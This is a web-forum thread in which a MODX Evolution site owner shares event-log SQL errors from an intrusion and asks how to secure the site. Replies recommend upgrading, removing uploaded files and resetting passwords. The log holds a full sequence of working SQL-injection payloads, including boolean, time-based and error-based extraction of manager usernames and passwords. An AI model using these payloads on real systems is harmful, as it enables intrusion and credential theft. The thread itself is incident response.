We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 36755
    • 41 Posts
    Today I have discovered some new php files that were arbitrary uploaded, I thought first it is the q2a software I am using but checking the modx event log plus the manager log, I can see that the attacker came by MODX Evolution!

    After entering in the system he uploaded a file stats.php https://github.com/echteinfachtv/q2a-various/blob/master/stats.php that gave him control over the server:



    MODx Parse Error from event log (how he entered the manager panel)

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ',(("]]').]' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND 6513=8505 AND ('GsiA'='GsiA' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND 8413=8413 AND ('sRCb'='sRCb' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND (SELECT 2315 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (2315=2315) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Knbe'='Knbe' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 2315 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (2315=2315) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pdru'='Pdru' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''; SELECT SLEEP(5)-- ' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 5530#' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 6#' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 10#' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 5#' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4465 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (8002 = 8002) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Payy'='Payy' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 8664 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xeaz'='xeaz' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6131 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FPmo'='FPmo' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 9887 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XLgX'='XLgX' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 5834 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AEwg'='AEwg' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6947 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 1,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kzfw'='kzfw' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 1761 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 1,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'seHf'='seHf' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4478 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 2,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KLre'='KLre' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 1391 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 2,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PjWz'='PjWz' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6916 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM db348277_7.modx_manager_users),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YArq'='YArq' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4628 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lZHc'='lZHc' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 7605 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yDor'='yDor' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 8409 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZeOE'='ZeOE' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''' LIMIT 1;

    Later on the attacker uploaded more files, you can read about here:
    http://stackoverflow.com/questions/17945523/our-q2a-forum-got-hacked-by-ccteam-what-are-these-php-files-doing
    http://stackoverflow.com/questions/17946838/has-anybody-heard-about-blackhats-with-kernel-exploits-exploit-enlightenment
    http://question2answer.org/qa/26227/hacked-russians-files-include-plugin-theme-folder-discovered

    Please help, how can I prevent another attack?

    I have no idea which settings the attacker has changed within modx, can I see full details from the event log?

    Thank you! [ed. note: kajus99 last edited this post 10 years, 7 months ago.]
      • 42046
      • 436 Posts
      Are you using Evo 1.0.5 as your signature suggests? There were several security flaw updates in 1.0.8 and 1.0.9

      Those logs look a bit like the hash array exploit that was fixed in 1.0.8

      https://raw.github.com/modxcms/evolution/v1.0.10/install/changelog.txt
      • And that is why it's important to keep an eye on security reports and updates.

        http://forums.modx.com/board/8/security-notices
          Studying MODX in the desert - http://sottwell.com
          Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
          Join the Slack Community - http://modx.org
          • 44258
          • 33 Posts
          is the security of your site was not proper work.
            • 36755
            • 41 Posts
            I updated to the latest. Hope that fixes it!
            • If the intruder uploaded malicious scripts, you'll still be hacked. That's the whole point of getting access.
                Studying MODX in the desert - http://sottwell.com
                Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
                Join the Slack Community - http://modx.org
                • 36755
                • 41 Posts
                I removed all former modx files, and uploaded the new version. Then I checked the current database against the database from a clean backup to see changes. There were none, just the Parser error due to the hack.

                I also checked files that have been uploaded within the time frame from hack to now using Filezilla, and removed the malicious ones.

                What do I miss? thanks smiley
                • Sounds like you did everything.
                    Studying MODX in the desert - http://sottwell.com
                    Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
                    Join the Slack Community - http://modx.org
                    • 11681
                    • 98 Posts
                    Kai, why did it occur to you to look for the site hack in the first place? Did your site exhibit some strange behavior as a side-effect of the hack? Or did you perhaps just happen to see the unfamiliar new PHP while doing some development work?
                      I looked just like that in 1964.
                    • Looks like your passwords may have been mined too: you should change all of them for every user you had on that site and email the users that the passwords may have been compromised so they should change their passwords on any sites that may have used the same passwords. Never reuse a password. We're developing some custom security options for our servers to help prevent hacks like this from ever succeeding -- a good host can help reduce the risk of stuff like this.